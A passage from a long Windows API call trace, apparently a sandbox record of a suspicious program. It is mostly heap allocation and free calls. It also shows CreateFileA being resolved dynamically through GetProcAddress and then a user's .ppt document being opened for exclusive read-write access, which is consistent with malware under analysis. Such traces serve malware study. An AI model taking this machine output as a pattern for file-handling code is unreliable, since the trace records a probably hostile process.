lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.207] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.208] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76e570 [0075.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76e570, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.208] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e570 [0075.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76e570, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0075.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.209] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0075.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0075.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10001) returned 0x795ff8 [0075.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0075.209] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4a) returned 0x6d34d8 [0075.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt", cchWideChar=74, lpMultiByteStr=0x6d34d8, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt", lpUsedDefaultChar=0x0) returned 74 [0075.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0075.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.210] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\du_aud-fz3ji9.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x795ff8, cbMultiByte=74, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x94) returned 0x6b9e98 [0075.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x795ff8, cbMultiByte=74, lpWideCharStr=0x6b9e98, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt") returned 74 [0075.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa0) returned 0x699838 [0075.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0075.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.212] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0075.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.213] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0075.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8978 [0075.213] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0075.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0075.214] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.214] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, 